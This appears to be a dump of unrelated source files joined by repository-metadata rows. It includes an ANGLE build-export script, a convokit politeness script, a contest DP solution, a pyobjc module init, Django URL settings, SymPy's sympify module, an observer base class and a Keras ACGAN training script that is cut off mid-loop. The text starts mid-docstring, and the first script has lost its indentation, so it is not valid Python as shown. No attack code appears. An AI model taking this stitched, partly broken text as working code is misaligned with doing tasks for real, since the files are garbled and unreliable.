Our repo: https://github.com/mozilla/angle
It has branches like 'firefox-60' which is the branch we use for pulling into
Gecko with this script.
This script leaves a record of the merge-base and cherry-picks that we pull into
Gecko. (gfx/angle/cherries.log)
ANGLE<->Chrome version mappings are here: https://omahaproxy.appspot.com/
An easy choice is to grab Chrome's Beta's ANGLE branch.
## Usage
Prepare your env:
~~~
export PATH="$PATH:/path/to/depot_tools"
~~~
If this is a new repo, don't forget:
~~~
# In the angle repo:
./scripts/bootstrap.py
gclient sync
~~~
Update: (in the angle repo)
~~~
# In the angle repo:
/path/to/gecko/gfx/angle/update-angle.py origin/chromium/XXXX
git push moz # Push the firefox-XX branch to github.com/mozilla/angle
~~~~
'''
import json
import os
import pathlib
import re
import shutil
import subprocess
import sys
from typing import * # mypy annotations
REPO_DIR = pathlib.Path.cwd()
GN_ENV = dict(os.environ)
# We need to set DEPOT_TOOLS_WIN_TOOLCHAIN to 0 for non-Googlers, but otherwise
# leave it unset since vs_toolchain.py assumes that the user is a Googler with
# the Visual Studio files in depot_tools if DEPOT_TOOLS_WIN_TOOLCHAIN is not
# explicitly set to 0.
vs_found = False
for directory in os.environ['PATH'].split(os.pathsep):
vs_dir = os.path.join(directory, 'win_toolchain', 'vs_files')
if os.path.exists(vs_dir):
vs_found = True
break
if not vs_found:
GN_ENV['DEPOT_TOOLS_WIN_TOOLCHAIN'] = '0'
(OUT_DIR, *ROOTS) = sys.argv[1:]
assert len(ROOTS), 'Usage: export_targets.py OUT_DIR ROOTS...'
for x in ROOTS:
assert x.startswith('//:')
# ------------------------------------------------------------------------------
def run_checked(*args, **kwargs):
print(' ', args, file=sys.stderr)
sys.stderr.flush()
return subprocess.run(args, check=True, **kwargs)
def sortedi(x):
return sorted(x, key=str.lower)
def dag_traverse(root_keys: Sequence[str], pre_recurse_func: Callable[[str], list]):
visited_keys: Set[str] = set()
def recurse(key):
if key in visited_keys:
return
visited_keys.add(key)
t = pre_recurse_func(key)
try:
(next_keys, post_recurse_func) = t
except ValueError:
(next_keys,) = t
post_recurse_func = None
for x in next_keys:
recurse(x)
if post_recurse_func:
post_recurse_func(key)
return
for x in root_keys:
recurse(x)
return
# ------------------------------------------------------------------------------
print('Importing graph', file=sys.stderr)
try:
p = run_checked('gn', 'desc', '--format=json', str(OUT_DIR), '*', stdout=subprocess.PIPE,
env=GN_ENV, shell=(True if sys.platform == 'win32' else False))
except subprocess.CalledProcessError:
sys.stderr.buffer.write(b'`gn` failed. Is depot_tools in your PATH?\n')
exit(1)
# -
print('\nProcessing graph', file=sys.stderr)
descs = json.loads(p.stdout.decode())
# Ready to traverse
# ------------------------------------------------------------------------------
LIBRARY_TYPES = ('shared_library', 'static_library')
def flattened_target(target_name: str, descs: dict, stop_at_lib: bool =True) -> dict:
flattened = dict(descs[target_name])
EXPECTED_TYPES = LIBRARY_TYPES + ('source_set', 'group', 'action')
def pre(k):
dep = descs[k]
dep_type = dep['type']
deps = dep['deps']
if stop_at_lib and dep_type in LIBRARY_TYPES:
return ((),)
if dep_type == 'copy':
assert not deps, (target_name, dep['deps'])
else:
assert dep_type in EXPECTED_TYPES, (k, dep_type)
for (k,v) in dep.items():
if type(v) in (list, tuple, set):
flattened[k] = sortedi(set(flattened.get(k, []) + v))
else:
#flattened.setdefault(k, v)
pass
return (deps,)
dag_traverse(descs[target_name]['deps'], pre)
return flattened
# ------------------------------------------------------------------------------
# Check that includes are valid. (gn's version of this check doesn't seem to work!)
INCLUDE_REGEX = re.compile(b'(?:^|\\n) *# *include +([<"])([^>"]+)[>"]')
assert INCLUDE_REGEX.match(b'#include "foo"')
assert INCLUDE_REGEX.match(b'\n#include "foo"')
# Most of these are ignored because this script does not currently handle
# #includes in #ifdefs properly, so they will erroneously be marked as being
# included, but not part of the source list.
IGNORED_INCLUDES = {
b'compiler/translator/TranslatorESSL.h',
b'compiler/translator/TranslatorGLSL.h',
b'compiler/translator/TranslatorHLSL.h',
b'compiler/translator/TranslatorMetal.h',
b'compiler/translator/TranslatorVulkan.h',
b'libANGLE/renderer/d3d/DeviceD3D.h',
b'libANGLE/renderer/d3d/DisplayD3D.h',
b'libANGLE/renderer/d3d/RenderTargetD3D.h',
b'libANGLE/renderer/d3d/d3d11/winrt/NativeWindow11WinRT.h',
b'libANGLE/renderer/gl/glx/DisplayGLX.h',
b'libANGLE/renderer/gl/cgl/DisplayCGL.h',
b'libANGLE/renderer/gl/egl/ozone/DisplayOzone.h',
b'libANGLE/renderer/gl/egl/android/DisplayAndroid.h',
b'libANGLE/renderer/gl/wgl/DisplayWGL.h',
b'libANGLE/renderer/metal/DisplayMtl_api.h',
b'libANGLE/renderer/null/DisplayNULL.h',
b'libANGLE/renderer/vulkan/android/DisplayVkAndroid.h',
b'libANGLE/renderer/vulkan/fuchsia/DisplayVkFuchsia.h',
b'libANGLE/renderer/vulkan/win32/DisplayVkWin32.h',
b'libANGLE/renderer/vulkan/xcb/DisplayVkXcb.h',
b'kernel/image.h',
}
IGNORED_INCLUDE_PREFIXES = {
b'android',
b'Carbon',
b'CoreFoundation',
b'CoreServices',
b'IOSurface',
b'mach',
b'mach-o',
b'OpenGL',
b'pci',
b'sys',
b'wrl',
b'X11',
}
IGNORED_DIRECTORIES = {
'//third_party/glslang',
'//third_party/spirv-tools',
'//third_party/SwiftShader',
'//third_party/vulkan-headers',
'//third_party/vulkan-loader',
'//third_party/vulkan-tools',
'//third_party/vulkan-validation-layers',
}
def has_all_includes(target_name: str, descs: dict) -> bool:
for ignored_directory in IGNORED_DIRECTORIES:
if target_name.startswith(ignored_directory):
return True
flat = flattened_target(target_name, descs, stop_at_lib=False)
acceptable_sources = flat.get('sources', []) + flat.get('outputs', [])
acceptable_sources = {x.rsplit('/', 1)[-1].encode() for x in acceptable_sources}
ret = True
desc = descs[target_name]
for cur_file in desc.get('sources', []):
assert cur_file.startswith('/'), cur_file
if not cur_file.startswith('//'):
continue
cur_file = pathlib.Path(cur_file[2:])
text = cur_file.read_bytes()
for m in INCLUDE_REGEX.finditer(text):
if m.group(1) == b'<':
continue
include = m.group(2)
if include in IGNORED_INCLUDES:
continue
try:
(prefix, _) = include.split(b'/', 1)
if prefix in IGNORED_INCLUDE_PREFIXES:
continue
except ValueError:
pass
include_file = include.rsplit(b'/', 1)[-1]
if include_file not in acceptable_sources:
#print(' acceptable_sources:')
#for x in sorted(acceptable_sources):
# print(' ', x)
print('Warning in {}: {}: Invalid include: {}'.format(target_name, cur_file, include), file=sys.stderr)
ret = False
#print('Looks valid:', m.group())
continue
return ret
# -
# Gather real targets:
def gather_libraries(roots: Sequence[str], descs: dict) -> Set[str]:
libraries = set()
def fn(target_name):
cur = descs[target_name]
print(' ' + cur['type'], target_name, file=sys.stderr)
assert has_all_includes(target_name, descs), target_name
if cur['type'] in ('shared_library', 'static_library'):
libraries.add(target_name)
return (cur['deps'], )
dag_traverse(roots, fn)
return libraries
# -
libraries = gather_libraries(ROOTS, descs)
print(f'\n{len(libraries)} libraries:', file=sys.stderr)
for k in libraries:
print(f' {k}', file=sys.stderr)
print('\nstdout begins:', file=sys.stderr)
sys.stderr.flush()
# ------------------------------------------------------------------------------
# Output
out = {k: flattened_target(k, descs) for k in libraries}
for (k,desc) in out.items():
dep_libs: Set[str] = set()
for dep_name in set(desc['deps']):
dep = descs[dep_name]
if dep['type'] in LIBRARY_TYPES:
dep_libs.add(dep_name[3:])
desc['deps'] = sortedi(dep_libs)
json.dump(out, sys.stdout, indent=' ')
exit(0)
| [
"elix22@gmail.com"
] | elix22@gmail.com |
ede1040ed424de83ddae76fb583b84076606c140 | 5002d20adbd983963f71ceb0bfaea148b1cbc079 | /CSE/CSE Major Projects - 2017_21/Politeness Transfer_ A Tag and Generate Approach/code/be-af.py | e316ef98b46f41f7fb3320e27fd4b00cebb5e039 | [] | no_license | 19WH1A0578/BVRITHYDERABAD | d15863ab255837bc11e49ff0742f6d6ab32c2c28 | 2492f5bd0eebf9103566a0cc7f96d732407c4317 | refs/heads/main | 2023-07-03T01:46:12.654932 | 2021-07-31T07:09:54 | 2021-07-31T07:09:54 | 384,429,090 | 1 | 0 | null | 2021-07-09T12:23:28 | 2021-07-09T12:23:28 | null | UTF-8 | Python | false | false | 1,082 | py | # -*- coding: utf-8 -*-
import pandas as pd
import os
from convokit import Corpus, Utterance, Speaker
from convokit import PolitenessStrategies
train_corpus = Corpus(filename=("data/train/training-corpus/"))
ps = PolitenessStrategies(strategy_attribute_name = "strategies", \
marker_attribute_name = "markers", \
strategy_collection="politeness_local")
# it is important to set markers to True
train_corpus = ps.transform(train_corpus, markers=True)
for utt in train_corpus.iter_utterances():
strategy_split = utt.meta['strategy']
assert utt.meta['strategies'][strategy_split] == 1
# helper functions further detailed in Marker_Edits.ipynb
from strategy_manipulation import remove_strategies_from_utt
for utt in train_corpus.iter_utterances():
remove_strategies_from_utt(utt, [utt.meta['strategy']])
utt = train_corpus.get_utterance('100087711.41.31')
# 100087711.41.31
# 10387534.0.0
# 105319599.26773.0
print("BEFORE:", utt.text)
print("AFTER:", utt.meta)
| [
"saisudhavadisina@gmail.com"
] | saisudhavadisina@gmail.com |
660d20122ec3c754f92aa8e51fb1153f3787c410 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02901/s827366183.py | e8d52e3e5d9a72d4e8c404ef73945cacb67be0a1 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 794 | py | INF = 2*10**7
def main():
N, M = (int(i) for i in input().split())
A = []
B = []
C = []
for _ in range(M):
a, b = (int(i) for i in input().split())
A.append(a)
B.append(b)
bit = 0
for i in input().split():
bit |= (1 << (int(i)-1))
C.append(bit)
dp = [[INF]*(1 << N) for _ in range(M+1)]
dp[0][0] = 0
for i in range(M):
for j in range(1 << N):
dp[i+1][j] = min(dp[i+1][j], dp[i][j])
if dp[i][j] != INF:
next_bit = j | C[i]
dp[i+1][next_bit] = min(dp[i+1][next_bit], dp[i][j] + A[i])
ans = dp[-1][-1]
if ans == INF:
print(-1)
else:
print(ans)
# print(*dp, sep="\n")
if __name__ == '__main__':
main()
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
d63665e90489f68f80177c8430c39c23d6a03832 | f80ef3a3cf859b13e8af8433af549b6b1043bf6e | /pyobjc-framework-SystemConfiguration/Lib/SystemConfiguration/__init__.py | cf487eb2587ebcfb8bbfd19031f0c22d49f7614c | [
"MIT"
] | permissive | ronaldoussoren/pyobjc | 29dc9ca0af838a56105a9ddd62fb38ec415f0b86 | 77b98382e52818690449111cd2e23cd469b53cf5 | refs/heads/master | 2023-09-01T05:15:21.814504 | 2023-06-13T20:00:17 | 2023-06-13T20:00:17 | 243,933,900 | 439 | 49 | null | 2023-06-25T02:49:07 | 2020-02-29T08:43:12 | Python | UTF-8 | Python | false | false | 993 | py | """
Python mapping for the SystemConfiguration framework.
This module does not contain docstrings for the wrapped code, check Apple's
documentation for details on how to use these functions and classes.
"""
import sys
import Foundation
import objc
from SystemConfiguration import _metadata
sys.modules["SystemConfiguration"] = mod = objc.ObjCLazyModule(
"SystemConfiguration",
"com.apple.SystemConfiguration",
objc.pathForFramework("/System/Library/Frameworks/SystemConfiguration.framework"),
_metadata.__dict__,
None,
{
"__doc__": __doc__,
"__path__": __path__,
"__loader__": globals().get("__loader__", None),
"objc": objc,
},
(Foundation,),
)
del sys.modules["SystemConfiguration._metadata"]
import SystemConfiguration._manual as m # isort:skip # noqa: E402
for nm in dir(m):
setattr(mod, nm, getattr(m, nm))
mod.SCBondInterfaceRef = mod.SCNetworkInterfaceRef
mod.SCVLANInterfaceRef = mod.SCNetworkInterfaceRef
| [
"ronaldoussoren@mac.com"
] | ronaldoussoren@mac.com |
ad60d3723a3aa6548bac9334238ccc7213d77e9d | 5f67c696967456c063e5f8a0d14cf18cf845ad38 | /installer/sympy/core/sympify.py | 1a6415e6be5aa9cfcac775523a52e978a7d6c1e5 | [] | no_license | wuxi20/Pythonista | 3f2abf8c40fd6554a4d7596982c510e6ba3d6d38 | acf12d264615749f605a0a6b6ea7ab72442e049c | refs/heads/master | 2020-04-02T01:17:39.264328 | 2019-04-16T18:26:59 | 2019-04-16T18:26:59 | 153,848,116 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,615 | py | """sympify -- convert objects SymPy internal format"""
from __future__ import print_function, division
from inspect import getmro
from .core import all_classes as sympy_classes
from .compatibility import iterable, string_types
class SympifyError(ValueError):
def __init__(self, expr, base_exc=None):
self.expr = expr
self.base_exc = base_exc
def __str__(self):
if self.base_exc is None:
return "SympifyError: %r" % (self.expr,)
return ("Sympify of expression '%s' failed, because of exception being "
"raised:\n%s: %s" % (self.expr, self.base_exc.__class__.__name__,
str(self.base_exc)))
converter = {} # See sympify docstring.
class CantSympify(object):
"""
Mix in this trait to a class to disallow sympification of its instances.
Example
=======
>>> from sympy.core.sympify import sympify, CantSympify
>>> class Something(dict):
... pass
...
>>> sympify(Something())
{}
>>> class Something(dict, CantSympify):
... pass
...
>>> sympify(Something())
Traceback (most recent call last):
...
SympifyError: SympifyError: {}
"""
pass
def sympify(a, locals=None, convert_xor=True, strict=False, rational=False, evaluate=True):
"""Converts an arbitrary expression to a type that can be used inside SymPy.
For example, it will convert Python ints into instance of sympy.Rational,
floats into instances of sympy.Float, etc. It is also able to coerce symbolic
expressions which inherit from Basic. This can be useful in cooperation
with SAGE.
It currently accepts as arguments:
- any object defined in sympy
- standard numeric python types: int, long, float, Decimal
- strings (like "0.09" or "2e-19")
- booleans, including ``None`` (will leave ``None`` unchanged)
- lists, sets or tuples containing any of the above
If the argument is already a type that SymPy understands, it will do
nothing but return that value. This can be used at the beginning of a
function to ensure you are working with the correct type.
>>> from sympy import sympify
>>> sympify(2).is_integer
True
>>> sympify(2).is_real
True
>>> sympify(2.0).is_real
True
>>> sympify("2.0").is_real
True
>>> sympify("2e-45").is_real
True
If the expression could not be converted, a SympifyError is raised.
>>> sympify("x***2")
Traceback (most recent call last):
...
SympifyError: SympifyError: "could not parse u'x***2'"
Locals
------
The sympification happens with access to everything that is loaded
by ``from sympy import *``; anything used in a string that is not
defined by that import will be converted to a symbol. In the following,
the ``bitcout`` function is treated as a symbol and the ``O`` is
interpreted as the Order object (used with series) and it raises
an error when used improperly:
>>> s = 'bitcount(42)'
>>> sympify(s)
bitcount(42)
>>> sympify("O(x)")
O(x)
>>> sympify("O + 1")
Traceback (most recent call last):
...
TypeError: unbound method...
In order to have ``bitcount`` be recognized it can be imported into a
namespace dictionary and passed as locals:
>>> from sympy.core.compatibility import exec_
>>> ns = {}
>>> exec_('from sympy.core.evalf import bitcount', ns)
>>> sympify(s, locals=ns)
6
In order to have the ``O`` interpreted as a Symbol, identify it as such
in the namespace dictionary. This can be done in a variety of ways; all
three of the following are possibilities:
>>> from sympy import Symbol
>>> ns["O"] = Symbol("O") # method 1
>>> exec_('from sympy.abc import O', ns) # method 2
>>> ns.update(dict(O=Symbol("O"))) # method 3
>>> sympify("O + 1", locals=ns)
O + 1
If you want *all* single-letter and Greek-letter variables to be symbols
then you can use the clashing-symbols dictionaries that have been defined
there as private variables: _clash1 (single-letter variables), _clash2
(the multi-letter Greek names) or _clash (both single and multi-letter
names that are defined in abc).
>>> from sympy.abc import _clash1
>>> _clash1
{'C': C, 'E': E, 'I': I, 'N': N, 'O': O, 'Q': Q, 'S': S}
>>> sympify('C & Q', _clash1)
And(C, Q)
Strict
------
If the option ``strict`` is set to ``True``, only the types for which an
explicit conversion has been defined are converted. In the other
cases, a SympifyError is raised.
>>> print(sympify(None))
None
>>> sympify(None, strict=True)
Traceback (most recent call last):
...
SympifyError: SympifyError: None
Evaluation
----------
If the option ``evaluate`` is set to ``False``, then arithmetic and
operators will be converted into their SymPy equivalents and the
``evaluate=False`` option will be added. Nested ``Add`` or ``Mul`` will
be denested first. This is done via an AST transformation that replaces
operators with their SymPy equivalents, so if an operand redefines any
of those operations, the redefined operators will not be used.
>>> sympify('2**2 / 3 + 5')
19/3
>>> sympify('2**2 / 3 + 5', evaluate=False)
2**2/3 + 5
Extending
---------
To extend ``sympify`` to convert custom objects (not derived from ``Basic``),
just define a ``_sympy_`` method to your class. You can do that even to
classes that you do not own by subclassing or adding the method at runtime.
>>> from sympy import Matrix
>>> class MyList1(object):
... def __iter__(self):
... yield 1
... yield 2
... raise StopIteration
... def __getitem__(self, i): return list(self)[i]
... def _sympy_(self): return Matrix(self)
>>> sympify(MyList1())
Matrix([
[1],
[2]])
If you do not have control over the class definition you could also use the
``converter`` global dictionary. The key is the class and the value is a
function that takes a single argument and returns the desired SymPy
object, e.g. ``converter[MyList] = lambda x: Matrix(x)``.
>>> class MyList2(object): # XXX Do not do this if you control the class!
... def __iter__(self): # Use _sympy_!
... yield 1
... yield 2
... raise StopIteration
... def __getitem__(self, i): return list(self)[i]
>>> from sympy.core.sympify import converter
>>> converter[MyList2] = lambda x: Matrix(x)
>>> sympify(MyList2())
Matrix([
[1],
[2]])
Notes
=====
Sometimes autosimplification during sympification results in expressions
that are very different in structure than what was entered. Until such
autosimplification is no longer done, the ``kernS`` function might be of
some use. In the example below you can see how an expression reduces to
-1 by autosimplification, but does not do so when ``kernS`` is used.
>>> from sympy.core.sympify import kernS
>>> from sympy.abc import x
>>> -2*(-(-x + 1/x)/(x*(x - 1/x)**2) - 1/(x*(x - 1/x))) - 1
-1
>>> s = '-2*(-(-x + 1/x)/(x*(x - 1/x)**2) - 1/(x*(x - 1/x))) - 1'
>>> sympify(s)
-1
>>> kernS(s)
-2*(-(-x + 1/x)/(x*(x - 1/x)**2) - 1/(x*(x - 1/x))) - 1
"""
try:
cls = a.__class__
except AttributeError: # a is probably an old-style class object
cls = type(a)
if cls in sympy_classes:
return a
if cls is type(None):
if strict:
raise SympifyError(a)
else:
return a
try:
return converter[cls](a)
except KeyError:
for superclass in getmro(cls):
try:
return converter[superclass](a)
except KeyError:
continue
if isinstance(a, CantSympify):
raise SympifyError(a)
try:
return a._sympy_()
except AttributeError:
pass
if not isinstance(a, string_types):
for coerce in (float, int):
try:
return sympify(coerce(a))
except (TypeError, ValueError, AttributeError, SympifyError):
continue
if strict:
raise SympifyError(a)
if iterable(a):
try:
return type(a)([sympify(x, locals=locals, convert_xor=convert_xor,
rational=rational) for x in a])
except TypeError:
# Not all iterables are rebuildable with their type.
pass
if isinstance(a, dict):
try:
return type(a)([sympify(x, locals=locals, convert_xor=convert_xor,
rational=rational) for x in a.items()])
except TypeError:
# Not all iterables are rebuildable with their type.
pass
# At this point we were given an arbitrary expression
# which does not inherit from Basic and doesn't implement
# _sympy_ (which is a canonical and robust way to convert
# anything to SymPy expression).
#
# As a last chance, we try to take "a"'s normal form via unicode()
# and try to parse it. If it fails, then we have no luck and
# return an exception
try:
from .compatibility import unicode
a = unicode(a)
except Exception as exc:
raise SympifyError(a, exc)
from sympy.parsing.sympy_parser import (parse_expr, TokenError,
standard_transformations)
from sympy.parsing.sympy_parser import convert_xor as t_convert_xor
from sympy.parsing.sympy_parser import rationalize as t_rationalize
transformations = standard_transformations
if rational:
transformations += (t_rationalize,)
if convert_xor:
transformations += (t_convert_xor,)
try:
a = a.replace('\n', '')
expr = parse_expr(a, local_dict=locals, transformations=transformations, evaluate=evaluate)
except (TokenError, SyntaxError) as exc:
raise SympifyError('could not parse %r' % a, exc)
return expr
def _sympify(a):
"""
Short version of sympify for internal usage for __add__ and __eq__ methods
where it is ok to allow some things (like Python integers and floats) in
the expression. This excludes things (like strings) that are unwise to
allow into such an expression.
>>> from sympy import Integer
>>> Integer(1) == 1
True
>>> Integer(1) == '1'
False
>>> from sympy.abc import x
>>> x + 1
x + 1
>>> x + '1'
Traceback (most recent call last):
...
TypeError: unsupported operand type(s) for +: 'Symbol' and 'str'
see: sympify
"""
return sympify(a, strict=True)
def kernS(s):
"""Use a hack to try keep autosimplification from joining Integer or
minus sign into an Add of a Mul; this modification doesn't
prevent the 2-arg Mul from becoming an Add, however.
Examples
========
>>> from sympy.core.sympify import kernS
>>> from sympy.abc import x, y, z
The 2-arg Mul allows a leading Integer to be distributed but kernS will
prevent that:
>>> 2*(x + y)
2*x + 2*y
>>> kernS('2*(x + y)')
2*(x + y)
If use of the hack fails, the un-hacked string will be passed to sympify...
and you get what you get.
XXX This hack should not be necessary once issue 1497 has been resolved.
"""
import re
from sympy.core.symbol import Symbol
hit = False
if '(' in s:
if s.count('(') != s.count(")"):
raise SympifyError('unmatched left parenthesis')
kern = '_kern'
while kern in s:
kern += "_"
olds = s
# digits*( -> digits*kern*(
s = re.sub(r'(\d+)( *\* *)\(', r'\1*%s\2(' % kern, s)
# negated parenthetical
kern2 = kern + "2"
while kern2 in s:
kern2 += "_"
# step 1: -(...) --> kern-kern*(...)
target = r'%s-%s*(' % (kern, kern)
s = re.sub(r'- *\(', target, s)
# step 2: double the matching closing parenthesis
# kern-kern*(...) --> kern-kern*(...)kern2
i = nest = 0
while True:
j = s.find(target, i)
if j == -1:
break
j = s.find('(')
for j in range(j, len(s)):
if s[j] == "(":
nest += 1
elif s[j] == ")":
nest -= 1
if nest == 0:
break
s = s[:j] + kern2 + s[j:]
i = j
# step 3: put in the parentheses
# kern-kern*(...)kern2 --> (-kern*(...))
s = s.replace(target, target.replace(kern, "(", 1))
s = s.replace(kern2, ')')
hit = kern in s
for i in range(2):
try:
expr = sympify(s)
break
except: # the kern might cause unknown errors, so use bare except
if hit:
s = olds # maybe it didn't like the kern; use un-kerned s
hit = False
continue
expr = sympify(s) # let original error raise
if not hit:
return expr
rep = {Symbol(kern): 1}
def _clear(expr):
if isinstance(expr, (list, tuple, set)):
return type(expr)([_clear(e) for e in expr])
if hasattr(expr, 'subs'):
return expr.subs(rep, hack2=True)
return expr
expr = _clear(expr)
# hope that kern is not there anymore
return expr
| [
"22399993@qq.com"
] | 22399993@qq.com |
bd25c0f81a90e0e4885aa39d8448b944fd5868c5 | 5c309a45507e26ac7320a474d82c5887c7af9f30 | /MySite/MySite/urls.py | 4ce2d92aeef3abf905ee0d81702179359a2608c5 | [] | no_license | MMohan1/MySite | 09c003dcad8158ee3e16a5d14405cb6aaeb396fe | c14c2fb13cff10e79b8cb444ec1cf4996c7742cc | refs/heads/master | 2021-01-22T13:08:37.734894 | 2014-12-25T09:37:39 | 2014-12-25T09:37:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 420 | py | from django.conf.urls import patterns, include, url
from django.contrib import admin
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'MySite.views.home', name='home'),
url(r'^polls/',
include('polls.urls', namespace="polls")),
url(r'^admin/', include(admin.site.urls)),
)
| [
"manmohansharma987@gmail.com"
] | manmohansharma987@gmail.com |
6ab384b642a8b07cb9c428b54ea3e3024d822969 | e3365bc8fa7da2753c248c2b8a5c5e16aef84d9f | /indices/declens.py | fc0729c9a852460c42f02a55fcaa38f7b97bf136 | [] | no_license | psdh/WhatsintheVector | e8aabacc054a88b4cb25303548980af9a10c12a8 | a24168d068d9c69dc7a0fd13f606c080ae82e2a6 | refs/heads/master | 2021-01-25T10:34:22.651619 | 2015-09-23T11:54:06 | 2015-09-23T11:54:06 | 42,749,205 | 2 | 3 | null | 2015-09-23T11:54:07 | 2015-09-18T22:06:38 | Python | UTF-8 | Python | false | false | 294 | py | ii = [('ChanWS.py', 1), ('WilbRLW4.py', 1), ('WilbRLW2.py', 1), ('CoolWHM.py', 1), ('GilmCRS.py', 1), ('WadeJEB.py', 1), ('BachARE.py', 4), ('MereHHB3.py', 1), ('JacoWHI2.py', 1), ('JacoWHI.py', 2), ('DibdTRL.py', 1), ('DwigTHH.py', 1), ('SadlMLP2.py', 3), ('KeigTSS.py', 1), ('BentJDO.py', 1)] | [
"prabhjyotsingh95@gmail.com"
] | prabhjyotsingh95@gmail.com |
93055757e6e1ffa121edea16b0567e884338203f | b05fee086482565ef48785f2a9c57cfe2c169f68 | /part_one/3-observer_pattern/after/observer/subject_abc.py | f2fb23403b3aafcbd9450c06eee0527def13727a | [] | no_license | diegogcc/py-design_patterns | 76db926878d5baf9aea1f3d2f6a09f4866c3ce1e | 2b49b981f2d3514bbd02796fe9a8ec083df6bb38 | refs/heads/master | 2023-04-01T08:28:53.211024 | 2021-04-05T11:48:19 | 2021-04-05T11:48:19 | 304,145,791 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 575 | py | from abc import ABCMeta
from observer import ABCObserver
class ABCSubject(metaclass=ABCMeta):
_observers = set()
def attach(self, observer):
if not isinstance(observer, ABCObserver):
raise TypeError('Observer not derived from ABCObserver')
self._observers |= {observer}
def detach(self, observer):
self._observers -= {observer}
def notify(self, value=None):
for observer in self._observers:
if value is None:
observer.update()
else:
observer.update(value) | [
"diegoc906@gmail.com"
] | diegoc906@gmail.com |
7d35f14bb906cebc46778b3d46b888fb39a6dd75 | 17c08636954df7e565277d932c4434a924d7ee83 | /chapter5-improved-gan/acgan-mnist-5.3.1.py | 85e62937d86a4e898ff778b2f07ebba11f815105 | [
"MIT"
] | permissive | gbusr/Advanced-Deep-Learning-with-Keras | 539158ecacc25b30505349bfdb2bc903d6f5eeef | 74ac64963b0d93a8bb2c6078af2e16fe53702776 | refs/heads/master | 2020-03-19T10:03:14.563594 | 2018-06-06T12:00:33 | 2018-06-06T12:00:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,791 | py | '''Trains ACGAN on MNIST using Keras
This version of ACGAN is similar to DCGAN. The difference mainly
is that the z-vector of geneerator is conditioned by a one-hot label
to produce specific fake images. The discriminator is trained to
discriminate real from fake images and predict the corresponding
one-hot labels.
[1] Radford, Alec, Luke Metz, and Soumith Chintala.
"Unsupervised representation learning with deep convolutional
generative adversarial networks." arXiv preprint arXiv:1511.06434 (2015).
[2] Odena, Augustus, Christopher Olah, and Jonathon Shlens.
"Conditional image synthesis with auxiliary classifier gans."
arXiv preprint arXiv:1610.09585 (2016).
'''
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import keras
from keras.layers import Activation, Dense, Input
from keras.layers import Conv2D, Flatten
from keras.layers import Reshape, Conv2DTranspose
from keras.layers import LeakyReLU
from keras.layers import BatchNormalization
from keras.optimizers import RMSprop
from keras.models import Model
from keras.datasets import mnist
from keras.utils import to_categorical
from keras.models import load_model
import numpy as np
import math
import matplotlib.pyplot as plt
import os
import argparse
def build_generator(inputs, y_labels, image_size):
"""Build a Generator Model
Inputs are concatenated before Dense layer.
Stacks of BN-ReLU-Conv2DTranpose to generate fake images
Output activation is sigmoid instead of tanh in orig DCGAN.
Sigmoid converges easily.
# Arguments
inputs (Layer): Input layer of the generator (the z-vector)
y_labels (Layer): Input layer for one-hot vector to condition
the inputs
image_size: Target size of one side (assuming square image)
# Returns
Model: Generator Model
"""
image_resize = image_size // 4
kernel_size = 5
layer_filters = [128, 64, 32, 1]
x = keras.layers.concatenate([inputs, y_labels], axis=1)
x = Dense(image_resize * image_resize * layer_filters[0])(x)
x = Reshape((image_resize, image_resize, layer_filters[0]))(x)
for filters in layer_filters:
if filters > layer_filters[-2]:
strides = 2
else:
strides = 1
x = BatchNormalization()(x)
x = Activation('relu')(x)
x = Conv2DTranspose(filters=filters,
kernel_size=kernel_size,
strides=strides,
padding='same')(x)
x = Activation('sigmoid')(x)
generator = Model([inputs, y_labels], x, name='generator')
return generator
def build_discriminator(inputs, num_labels, image_size):
"""Build a Discriminator Model
Stacks of LeakyReLU-Conv2D to discriminate real from fake
The network does not converge with BN so it is not used here
unlike in DCGAN paper.
# Arguments
inputs (Layer): Input layer of the discriminator (the image)
num_labels (int): Dimension of one-hot vector output
image_size (int): Target size of one side (assuming square image)
# Returns
Model: Discriminator Model
"""
kernel_size = 5
layer_filters = [32, 64, 128, 256]
x = inputs
for filters in layer_filters:
if filters == layer_filters[-1]:
strides = 1
else:
strides = 2
x = LeakyReLU(alpha=0.2)(x)
x = Conv2D(filters=filters,
kernel_size=kernel_size,
strides=strides,
padding='same')(x)
x = Flatten()(x)
# First output is probability that the image is real
y_source = Dense(1)(x)
y_source = Activation('sigmoid', name='source')(y_source)
# Second output is 10-dim one-hot vector of label
y_class = Dense(layer_filters[-2])(x)
y_class = Dense(num_labels)(y_class)
y_class = Activation('softmax', name='label')(y_class)
discriminator = Model(inputs, [y_source, y_class], name='discriminator')
return discriminator
def train(models, data, params):
"""Train the discriminator and adversarial Networks
Alternately train discriminator and adversarial networks by batch.
Discriminator is trained first with real and fake images and
corresponding one-hot labels.
Adversarial is trained next with fake images pretending to be real and
corresponding one-hot labels.
Generate sample images per save_interval.
# Arguments
models (list): Generator, Discriminator, Adversarial models
data (list): x_train, y_train data
params (list): Network parameters
"""
generator, discriminator, adversarial = models
x_train, y_train = data
batch_size, latent_size, train_steps, num_labels, model_name = params
save_interval = 500
noise_input = np.random.uniform(-1.0, 1.0, size=[16, latent_size])
noise_class = np.eye(num_labels)[np.arange(0, 16) % num_labels]
print(model_name,
"Labels for generated images: ",
np.argmax(noise_class, axis=1))
for i in range(train_steps):
# Random real images and their labels
rand_indexes = np.random.randint(0, x_train.shape[0], size=batch_size)
real_images = x_train[rand_indexes, :, :, :]
real_labels = y_train[rand_indexes, :]
# Generate fake images and their labels
noise = np.random.uniform(-1.0, 1.0, size=[batch_size, latent_size])
fake_labels = np.eye(num_labels)[np.random.choice(num_labels,
batch_size)]
fake_images = generator.predict([noise, fake_labels])
x = np.concatenate((real_images, fake_images))
